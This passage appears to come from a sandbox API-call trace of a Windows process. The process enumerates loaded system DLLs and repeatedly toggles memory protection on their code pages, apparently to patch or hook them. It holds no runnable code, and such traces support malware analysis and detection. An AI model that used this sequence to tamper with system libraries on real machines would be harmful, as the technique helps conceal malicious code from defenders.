NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.653] Module32Next (hSnapshot=0x110, lpme=0x6ef5fc) returned 1 [0068.654] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0068.654] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0068.654] GetModuleFileNameA (in: hModule=0x757a0000, lpFilename=0x6ef4a4, nSize=0x105 | out: lpFilename="C:\\Windows\\syswow64\\SspiCli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")) returned 0x1f [0068.654] GetCurrentProcess () returned 0xffffffff [0068.654] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x757b0018, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x757b0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.655] GetCurrentProcess () returned 0xffffffff [0068.655] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x757b0018, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x757b0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.655] GetCurrentProcess () returned 0xffffffff [0068.655] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x757b0020, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x757b0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.655] GetCurrentProcess () returned 0xffffffff [0068.655] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x757b0020, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x757b0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.655] GetCurrentProcess () returned 0xffffffff [0068.655] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x757b00ac, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x757b0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.656] GetCurrentProcess () returned 0xffffffff [0068.656] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x757b00ac, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x757b0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.656] GetCurrentProcess () returned 0xffffffff [0068.656] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x757b00b4, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x757b0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.656] GetCurrentProcess () returned 0xffffffff [0068.656] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x757b00b4, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x757b0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.656] Module32Next (hSnapshot=0x110, lpme=0x6ef5fc) returned 1 [0068.657] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0068.657] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0068.657] GetModuleFileNameA (in: hModule=0x75790000, lpFilename=0x6ef4a4, nSize=0x105 | out: lpFilename="C:\\Windows\\syswow64\\CRYPTBASE.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")) returned 0x21 [0068.657] GetCurrentProcess () returned 0xffffffff [0068.657] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75791060, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75791000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.658] GetCurrentProcess () returned 0xffffffff [0068.658] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75791060, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75791000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.658] GetCurrentProcess () returned 0xffffffff [0068.658] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x7579109c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75791000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.658] GetCurrentProcess () returned 0xffffffff [0068.658] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x7579109c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75791000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.658] GetCurrentProcess () returned 0xffffffff [0068.658] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x757910a4, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75791000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.659] GetCurrentProcess () returned 0xffffffff [0068.659] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x757910a4, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75791000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.659] Module32Next (hSnapshot=0x110, lpme=0x6ef5fc) returned 1 [0068.659] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0068.660] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0068.660] GetModuleFileNameA (in: hModule=0x76e40000, lpFilename=0x6ef4a4, nSize=0x105 | out: lpFilename="C:\\Windows\\syswow64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")) returned 0x20 [0068.660] GetCurrentProcess () returned 0xffffffff [0068.660] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76e41238, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76e41000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.660] GetCurrentProcess () returned 0xffffffff [0068.660] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76e41238, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76e41000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.660] GetCurrentProcess () returned 0xffffffff [0068.660] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76e41258, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76e41000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.660] GetCurrentProcess () returned 0xffffffff [0068.660] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76e41258, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76e41000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.661] GetCurrentProcess () returned 0xffffffff [0068.661] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76e41260, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76e41000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.661] GetCurrentProcess () returned 0xffffffff [0068.661] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76e41260, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76e41000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.661] GetCurrentProcess () returned 0xffffffff [0068.661] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76e41268, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76e41000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.661] GetCurrentProcess () returned 0xffffffff [0068.661] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76e41268, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76e41000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.661] GetCurrentProcess () returned 0xffffffff [0068.661] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76e412c4, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76e41000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.662] GetCurrentProcess () returned 0xffffffff [0068.662] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76e412c4, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76e41000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.662] GetCurrentProcess () returned 0xffffffff [0068.662] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76e412c8, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76e41000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.662] GetCurrentProcess () returned 0xffffffff [0068.662] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76e412c8, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76e41000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.662] GetCurrentProcess () returned 0xffffffff [0068.662] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76e412cc, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76e41000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.662] GetCurrentProcess () returned 0xffffffff [0068.662] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76e412cc, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76e41000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.663] GetCurrentProcess () returned 0xffffffff [0068.663] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76e41300, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76e41000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.663] GetCurrentProcess () returned 0xffffffff [0068.663] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76e41300, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76e41000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.663] GetCurrentProcess () returned 0xffffffff [0068.663] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76e41308, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76e41000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.663] GetCurrentProcess () returned 0xffffffff [0068.663] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76e41308, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76e41000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.663] GetCurrentProcess () returned 0xffffffff [0068.664] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76e4132c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76e41000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.664] GetCurrentProcess () returned 0xffffffff [0068.664] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76e4132c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76e41000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.664] GetCurrentProcess () returned 0xffffffff [0068.664] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76e41384, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76e41000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.664] GetCurrentProcess () returned 0xffffffff [0068.664] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76e41384, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76e41000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.664] GetCurrentProcess () returned 0xffffffff [0068.664] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76e41390, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76e41000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.665] Module32Next (hSnapshot=0x110, lpme=0x6ef5fc) returned 1 [0068.666] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0068.666] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0068.666] GetModuleFileNameA (in: hModule=0x76620000, lpFilename=0x6ef4a4, nSize=0x105 | out: lpFilename="C:\\Windows\\syswow64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")) returned 0x1d [0068.667] GetCurrentProcess () returned 0xffffffff [0068.667] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x766214a0, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76621000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.667] GetCurrentProcess () returned 0xffffffff [0068.667] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x766214b0, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76621000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.668] GetCurrentProcess () returned 0xffffffff [0068.668] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x766214b0, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76621000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.668] GetCurrentProcess () returned 0xffffffff [0068.668] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x766219a8, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76621000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.668] GetCurrentProcess () returned 0xffffffff [0068.668] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x766219a8, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76621000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.668] GetCurrentProcess () returned 0xffffffff [0068.668] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x766219ac, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76621000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.669] GetCurrentProcess () returned 0xffffffff [0068.669] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x766219ac, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76621000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.669] GetCurrentProcess () returned 0xffffffff [0068.669] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76621a00, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76621000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.669] GetCurrentProcess () returned 0xffffffff [0068.669] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76621a00, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76621000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.669] Module32Next (hSnapshot=0x110, lpme=0x6ef5fc) returned 1 [0068.670] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0068.670] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0068.670] GetModuleFileNameA (in: hModule=0x759d0000, lpFilename=0x6ef4a4, nSize=0x105 | out: lpFilename="C:\\Windows\\syswow64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll")) returned 0x1f [0068.670] GetCurrentProcess () returned 0xffffffff [0068.670] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x759d113c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x759d1000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.671] GetCurrentProcess () returned 0xffffffff [0068.671] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x759d113c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x759d1000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.671] GetCurrentProcess () returned 0xffffffff [0068.671] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x759d114c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x759d1000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.671] GetCurrentProcess () returned 0xffffffff [0068.671] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x759d114c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x759d1000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.671] GetCurrentProcess () returned 0xffffffff [0068.671] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x759d1150, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x759d1000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.672] GetCurrentProcess () returned 0xffffffff [0068.672] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x759d1150, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x759d1000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.672] GetCurrentProcess () returned 0xffffffff [0068.672] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x759d1174, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x759d1000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.672] GetCurrentProcess () returned 0xffffffff [0068.672] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x759d1174, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x759d1000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.672] GetCurrentProcess () returned 0xffffffff [0068.672] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x759d11d4, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x759d1000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.672] GetCurrentProcess () returned 0xffffffff [0068.672] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x759d11d4, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x759d1000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.673] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x759d13b4, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x759d1000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.673] GetCurrentProcess () returned 0xffffffff [0068.673] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x759d13b4, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x759d1000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.673] GetCurrentProcess () returned 0xffffffff [0068.673] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x759d13c4, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x759d1000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.674] GetCurrentProcess () returned 0xffffffff [0068.674] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x759d13c4, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x759d1000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.674] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x759d21c0, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x759d2000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.674] GetCurrentProcess () returned 0xffffffff [0068.674] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x759d21c0, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x759d2000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.674] GetCurrentProcess () returned 0xffffffff [0068.674] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x759d224c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x759d2000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.674] GetCurrentProcess () returned 0xffffffff [0068.674] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x759d224c, 